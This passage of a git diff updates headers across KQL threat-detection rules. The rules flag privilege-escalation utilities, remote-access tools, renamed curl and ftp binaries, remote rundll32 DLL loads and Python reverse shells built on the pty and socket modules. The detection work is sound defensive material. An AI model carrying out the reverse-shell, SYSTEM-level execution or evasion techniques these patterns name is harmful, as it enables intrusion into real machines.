-// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003
-
-DeviceProcessEvents
+// Title: PUA - AdvancedRun Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-20
+// Level: medium
+// Description: Detects the execution of AdvancedRun utility
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003
+
+DeviceProcessEvents
 | where ProcessVersionInfoOriginalFileName =~ "AdvancedRun.exe" or (ProcessCommandLine contains " /EXEFilename " and ProcessCommandLine contains " /Run") or (ProcessCommandLine contains " /WindowState 0" and ProcessCommandLine contains " /RunAs " and ProcessCommandLine contains " /CommandLine ")
\ No newline at end of file
diff --git a/KQL/rules/Execution/pua_nircmd_execution.kql b/KQL/rules/Execution/pua_nircmd_execution.kql
index b63c5e66..da609a4d 100644
--- a/KQL/rules/Execution/pua_nircmd_execution.kql
+++ b/KQL/rules/Execution/pua_nircmd_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - NirCmd Execution
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-01-24
-// Level: medium
-// Description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-// False Positives:
-// - Legitimate use by administrators
-
-DeviceProcessEvents
+// Title: PUA - NirCmd Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-24
+// Level: medium
+// Description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+// False Positives:
+// - Legitimate use by administrators
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " execmd " or ProcessCommandLine contains ".exe script " or ProcessCommandLine contains ".exe shexec " or ProcessCommandLine contains " runinteractive ") or (FolderPath endswith "\\NirCmd.exe" or ProcessVersionInfoOriginalFileName =~ "NirCmd.exe")) or ((ProcessCommandLine contains " exec " or ProcessCommandLine contains " exec2 ") and (ProcessCommandLine contains " show " or ProcessCommandLine contains " hide "))
\ No newline at end of file
diff --git a/KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql b/KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql
index b7733538..df76df83 100644
--- a/KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql
+++ b/KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql
@@ -1,12 +1,12 @@
-// Title: PUA - NirCmd Execution As LOCAL SYSTEM
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-01-24
-// Level: high
-// Description: Detects the use of NirCmd tool for command execution as SYSTEM user
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-// False Positives:
-// - Legitimate use by administrators
-
-DeviceProcessEvents
+// Title: PUA - NirCmd Execution As LOCAL SYSTEM
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-24
+// Level: high
+// Description: Detects the use of NirCmd tool for command execution as SYSTEM user
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+// False Positives:
+// - Legitimate use by administrators
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " runassystem "
\ No newline at end of file
diff --git a/KQL/rules/Execution/pua_nsudo_execution.kql b/KQL/rules/Execution/pua_nsudo_execution.kql
index 6a97abed..4a6a6c26 100644
--- a/KQL/rules/Execution/pua_nsudo_execution.kql
+++ b/KQL/rules/Execution/pua_nsudo_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - NSudo Execution
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
-// Date: 2022-01-24
-// Level: high
-// Description: Detects the use of NSudo tool for command execution
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-// False Positives:
-// - Legitimate use by administrators
-
-DeviceProcessEvents
+// Title: PUA - NSudo Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
+// Date: 2022-01-24
+// Level: high
+// Description: Detects the use of NSudo tool for command execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+// False Positives:
+// - Legitimate use by administrators
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-U:S " or ProcessCommandLine contains "-U:T " or ProcessCommandLine contains "-U:E " or ProcessCommandLine contains "-P:E " or ProcessCommandLine contains "-M:S " or ProcessCommandLine contains "-M:H " or ProcessCommandLine contains "-U=S " or ProcessCommandLine contains "-U=T " or ProcessCommandLine contains "-U=E " or ProcessCommandLine contains "-P=E " or ProcessCommandLine contains "-M=S " or ProcessCommandLine contains "-M=H " or ProcessCommandLine contains "-ShowWindowMode:Hide") and ((FolderPath endswith "\\NSudo.exe" or FolderPath endswith "\\NSudoLC.exe" or FolderPath endswith "\\NSudoLG.exe") or (ProcessVersionInfoOriginalFileName in~ ("NSudo.exe", "NSudoLC.exe", "NSudoLG.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql b/KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql
index b5afa733..4f9233c4 100644
--- a/KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql
+++ b/KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql
@@ -1,10 +1,10 @@
-// Title: PUA - Radmin Viewer Utility Execution
-// Author: frack113
-// Date: 2022-01-22
-// Level: medium
-// Description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.lateral-movement, attack.t1072
-
-DeviceProcessEvents
+// Title: PUA - Radmin Viewer Utility Execution
+// Author: frack113
+// Date: 2022-01-22
+// Level: medium
+// Description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1072
+
+DeviceProcessEvents
 | where ProcessVersionInfoFileDescription =~ "Radmin Viewer" or ProcessVersionInfoProductName =~ "Radmin Viewer" or ProcessVersionInfoOriginalFileName =~ "Radmin.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/pua_runxcmd_execution.kql b/KQL/rules/Execution/pua_runxcmd_execution.kql
index 9f1eaeaf..945ac7af 100644
--- a/KQL/rules/Execution/pua_runxcmd_execution.kql
+++ b/KQL/rules/Execution/pua_runxcmd_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - RunXCmd Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-01-24
-// Level: high
-// Description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-// False Positives:
-// - Legitimate use by administrators
-
-DeviceProcessEvents
+// Title: PUA - RunXCmd Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-24
+// Level: high
+// Description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+// False Positives:
+// - Legitimate use by administrators
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " /account=system " or ProcessCommandLine contains " /account=ti ") and ProcessCommandLine contains "/exec="
\ No newline at end of file
diff --git a/KQL/rules/Execution/pua_wsudo_suspicious_execution.kql b/KQL/rules/Execution/pua_wsudo_suspicious_execution.kql
index 462dc670..bbdbff02 100644
--- a/KQL/rules/Execution/pua_wsudo_suspicious_execution.kql
+++ b/KQL/rules/Execution/pua_wsudo_suspicious_execution.kql
@@ -1,10 +1,10 @@
-// Title: PUA - Wsudo Suspicious Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-12-02
-// Level: high
-// Description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.privilege-escalation, attack.t1059
-
-DeviceProcessEvents
+// Title: PUA - Wsudo Suspicious Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-02
+// Level: high
+// Description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.privilege-escalation, attack.t1059
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-u System" or ProcessCommandLine contains "-uSystem" or ProcessCommandLine contains "-u TrustedInstaller" or ProcessCommandLine contains "-uTrustedInstaller" or ProcessCommandLine contains " --ti ") or (FolderPath endswith "\\wsudo.exe" or ProcessVersionInfoOriginalFileName =~ "wsudo.exe" or ProcessVersionInfoFileDescription =~ "Windows sudo utility" or InitiatingProcessFolderPath endswith "\\wsudo-bridge.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/python_inline_command_execution.kql b/KQL/rules/Execution/python_inline_command_execution.kql
index 7156c54c..f8f4b4ac 100644
--- a/KQL/rules/Execution/python_inline_command_execution.kql
+++ b/KQL/rules/Execution/python_inline_command_execution.kql
@@ -1,12 +1,12 @@
-// Title: Python Inline Command Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-02
-// Level: medium
-// Description: Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-// False Positives:
-// - Python libraries that use a flag starting with "-c". Filter according to your environment
-
-DeviceProcessEvents
+// Title: Python Inline Command Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-02
+// Level: medium
+// Description: Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Python libraries that use a flag starting with "-c". Filter according to your environment
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -c" and (ProcessVersionInfoOriginalFileName =~ "python.exe" or (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe"))) and (not(((InitiatingProcessCommandLine contains "-E -s -m ensurepip -U --default-pip" and InitiatingProcessFolderPath endswith "\\python.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Python" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Python")) or ((ProcessCommandLine contains "-W ignore::DeprecationWarning" and ProcessCommandLine contains "['install', '--no-cache-dir', '--no-index', '--find-links'," and ProcessCommandLine contains "'--upgrade', 'pip'") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Python" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Python"))))) and (not(((ProcessCommandLine contains "" and ProcessCommandLine contains "exec(compile(") or 
(InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft VS Code\\Code.exe", "C:\\Program Files (x86)\\Microsoft VS Code\\Code.exe"))))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql b/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql
index 62468ada..60bfc298 100644
--- a/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql
+++ b/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql
@@ -1,10 +1,10 @@
-// Title: Python Reverse Shell Execution Via PTY And Socket Modules
-// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-04-24
-// Level: high
-// Description: Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Python Reverse Shell Execution Via PTY And Socket Modules
+// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-24
+// Level: high
+// Description: Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -c " and ProcessCommandLine contains "import" and ProcessCommandLine contains "pty" and ProcessCommandLine contains "socket" and ProcessCommandLine contains "spawn" and ProcessCommandLine contains ".connect") and FolderPath contains "python"
\ No newline at end of file
diff --git a/KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql b/KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql
index 235e05ac..a156ddbb 100644
--- a/KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql
+++ b/KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql
@@ -1,10 +1,10 @@
-// Title: Python Spawning Pretty TTY on Windows
-// Author: Nextron Systems
-// Date: 2022-06-03
-// Level: high
-// Description: Detects python spawning a pretty tty
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Python Spawning Pretty TTY on Windows
+// Author: Nextron Systems
+// Date: 2022-06-03
+// Level: high
+// Description: Detects python spawning a pretty tty
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where (FolderPath endswith "python.exe" or FolderPath endswith "python3.exe" or FolderPath endswith "python2.exe") and ((ProcessCommandLine contains "import pty" and ProcessCommandLine contains ".spawn(") or ProcessCommandLine contains "from pty import spawn")
\ No newline at end of file
diff --git a/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql b/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql
index bc26a317..5e2e796d 100644
--- a/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql
+++ b/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql
@@ -1,10 +1,10 @@
-// Title: Python Spawning Pretty TTY Via PTY Module
-// Author: Nextron Systems
-// Date: 2022-06-03
-// Level: medium
-// Description: Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Python Spawning Pretty TTY Via PTY Module
+// Author: Nextron Systems
+// Date: 2022-06-03
+// Level: medium
+// Description: Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "import pty" or ProcessCommandLine contains "from pty ") and ProcessCommandLine contains "spawn" and ((FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/python3") or (FolderPath contains "/python2." or FolderPath contains "/python3."))
\ No newline at end of file
diff --git a/KQL/rules/Execution/query_usage_to_exfil_data.kql b/KQL/rules/Execution/query_usage_to_exfil_data.kql
index 1939f522..fff4c787 100644
--- a/KQL/rules/Execution/query_usage_to_exfil_data.kql
+++ b/KQL/rules/Execution/query_usage_to_exfil_data.kql
@@ -1,10 +1,10 @@
-// Title: Query Usage To Exfil Data
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-01
-// Level: medium
-// Description: Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Query Usage To Exfil Data
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: medium
+// Description: Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "session >" or ProcessCommandLine contains "process >") and FolderPath endswith ":\\Windows\\System32\\query.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql b/KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql
index 281ffec0..f0a44140 100644
--- a/KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql
+++ b/KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql
@@ -1,10 +1,10 @@
-// Title: Read Contents From Stdin Via Cmd.EXE
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-07
-// Level: medium
-// Description: Detect the use of "<" to read and potentially execute a file via cmd.exe
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.003
-
-DeviceProcessEvents
+// Title: Read Contents From Stdin Via Cmd.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-07
+// Level: medium
+// Description: Detect the use of "<" to read and potentially execute a file via cmd.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "<" and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql b/KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql
index 84cb2c88..bfc0adbc 100644
--- a/KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql
+++ b/KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql
@@ -1,12 +1,12 @@
-// Title: Rebuild Performance Counter Values Via Lodctr.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-15
-// Level: medium
-// Description: Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Legitimate usage by an administrator
-
-DeviceProcessEvents
+// Title: Rebuild Performance Counter Values Via Lodctr.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-15
+// Level: medium
+// Description: Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate usage by an administrator
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -r" or ProcessCommandLine contains " /r" or ProcessCommandLine contains " –r" or ProcessCommandLine contains " —r" or ProcessCommandLine contains " ―r") and (FolderPath endswith "\\lodctr.exe" and ProcessVersionInfoOriginalFileName =~ "LODCTR.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Execution/remcom_service_file_creation.kql b/KQL/rules/Execution/remcom_service_file_creation.kql
index 9a539835..82601c7f 100644
--- a/KQL/rules/Execution/remcom_service_file_creation.kql
+++ b/KQL/rules/Execution/remcom_service_file_creation.kql
@@ -1,10 +1,10 @@
-// Title: RemCom Service File Creation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-04
-// Level: medium
-// Description: Detects default RemCom service filename which indicates RemCom service installation and execution
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-
-DeviceFileEvents
+// Title: RemCom Service File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-04
+// Level: medium
+// Description: Detects default RemCom service filename which indicates RemCom service installation and execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+
+DeviceFileEvents
 | where FolderPath endswith "\\RemComSvc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql b/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql
index 49adea19..b52c3367 100644
--- a/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql
+++ b/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql
@@ -1,15 +1,15 @@
-// Title: Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate
-// Author: Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-02-08
-// Level: medium
-// Description: Detects the execution of an AnyDesk binary with a version prior to 8.0.8.
-// Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors.
-// Use this rule to detect instances of older versions of Anydesk using the compromised certificate
-// This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.initial-access
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate
+// Author: Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-08
+// Level: medium
+// Description: Detects the execution of an AnyDesk binary with a version prior to 8.0.8.
+// Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors.
+// Use this rule to detect instances of older versions of Anydesk using the compromised certificate
+// This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.initial-access
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\AnyDesk.exe" or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (ProcessVersionInfoProductVersion startswith "7.0." or ProcessVersionInfoProductVersion startswith "7.1." or ProcessVersionInfoProductVersion startswith "8.0.1" or ProcessVersionInfoProductVersion startswith "8.0.2" or ProcessVersionInfoProductVersion startswith "8.0.3" or ProcessVersionInfoProductVersion startswith "8.0.4" or ProcessVersionInfoProductVersion startswith "8.0.5" or ProcessVersionInfoProductVersion startswith "8.0.6" or ProcessVersionInfoProductVersion startswith "8.0.7")) and (not((ProcessCommandLine contains " --remove" or ProcessCommandLine contains " --uninstall")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql b/KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql
index a7e2f8ec..41bc9f2f 100644
--- a/KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql
+++ b/KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql
@@ -1,12 +1,12 @@
-// Title: Remote Access Tool - ScreenConnect Remote Command Execution
-// Author: Ali Alwashali
-// Date: 2023-10-10
-// Level: low
-// Description: Detects the execution of a system command via the ScreenConnect RMM service.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.003
-// False Positives:
-// - Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used.
-
-DeviceProcessEvents
+// Title: Remote Access Tool - ScreenConnect Remote Command Execution
+// Author: Ali Alwashali
+// Date: 2023-10-10
+// Level: low
+// Description: Detects the execution of a system command via the ScreenConnect RMM service.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+// False Positives:
+// - Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used.
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\TEMP\\ScreenConnect\\" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.ClientService.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql b/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql
index 88143191..4ba6c0c6 100644
--- a/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql
+++ b/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql
@@ -1,13 +1,13 @@
-// Title: Remote Access Tool - ScreenConnect Temporary File
-// Author: Ali Alwashali
-// Date: 2023-10-10
-// Level: low
-// Description: Detects the creation of files in a specific location by ScreenConnect RMM.
-// ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.003
-// False Positives:
-// - Legitimate use of ScreenConnect
-
-DeviceFileEvents
+// Title: Remote Access Tool - ScreenConnect Temporary File
+// Author: Ali Alwashali
+// Date: 2023-10-10
+// Level: low
+// Description: Detects the creation of files in a specific location by ScreenConnect RMM.
+// ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+// False Positives:
+// - Legitimate use of ScreenConnect
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "\\ScreenConnect.WindowsClient.exe" and FolderPath contains "\\Documents\\ConnectWiseControl\\Temp\\"
\ No newline at end of file
diff --git a/KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql b/KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql
index 97a8b480..df73b109 100644
--- a/KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql
+++ b/KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql
@@ -1,10 +1,10 @@
-// Title: Remote DLL Load Via Rundll32.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-09-18
-// Level: medium
-// Description: Detects a remote DLL load event via "rundll32.exe".
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204.002
-
-DeviceImageLoadEvents
+// Title: Remote DLL Load Via Rundll32.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-18
+// Level: medium
+// Description: Detects a remote DLL load event via "rundll32.exe".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+
+DeviceImageLoadEvents
 | where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql b/KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql
index 65dc81c2..bf8492a6 100644
--- a/KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql
+++ b/KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql
@@ -1,12 +1,12 @@
-// Title: Remote PowerShell Session Host Process (WinRM)
-// Author: Roberto Rodriguez @Cyb3rWard0g
-// Date: 2019-09-12
-// Level: medium
-// Description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.lateral-movement, attack.t1059.001, attack.t1021.006
-// False Positives:
-// - Legitimate usage of remote Powershell, e.g. for monitoring purposes.
-
-DeviceProcessEvents
+// Title: Remote PowerShell Session Host Process (WinRM)
+// Author: Roberto Rodriguez @Cyb3rWard0g
+// Date: 2019-09-12
+// Level: medium
+// Description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1059.001, attack.t1021.006
+// False Positives:
+// - Legitimate usage of remote Powershell, e.g. for monitoring purposes.
+
+DeviceProcessEvents
 | where FolderPath endswith "\\wsmprovhost.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/renamed_curl_exe_execution.kql b/KQL/rules/Execution/renamed_curl_exe_execution.kql
index be3e657b..463a23f7 100644
--- a/KQL/rules/Execution/renamed_curl_exe_execution.kql
+++ b/KQL/rules/Execution/renamed_curl_exe_execution.kql
@@ -1,10 +1,10 @@
-// Title: Renamed CURL.EXE Execution
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-09-11
-// Level: medium
-// Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
-
-DeviceProcessEvents
+// Title: Renamed CURL.EXE Execution
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-09-11
+// Level: medium
+// Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
 | where (ProcessVersionInfoOriginalFileName =~ "curl.exe" or ProcessVersionInfoFileDescription =~ "The curl executable") and (not(FolderPath contains "\\curl"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/renamed_ftp_exe_execution.kql b/KQL/rules/Execution/renamed_ftp_exe_execution.kql
index a5133238..4110a5a5 100644
--- a/KQL/rules/Execution/renamed_ftp_exe_execution.kql
+++ b/KQL/rules/Execution/renamed_ftp_exe_execution.kql
@@ -1,10 +1,10 @@
-// Title: Renamed FTP.EXE Execution
-// Author: Victor Sergeev, oscd.community
-// Date: 2020-10-09
-// Level: medium
-// Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
-
-DeviceProcessEvents
+// Title: Renamed FTP.EXE Execution
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
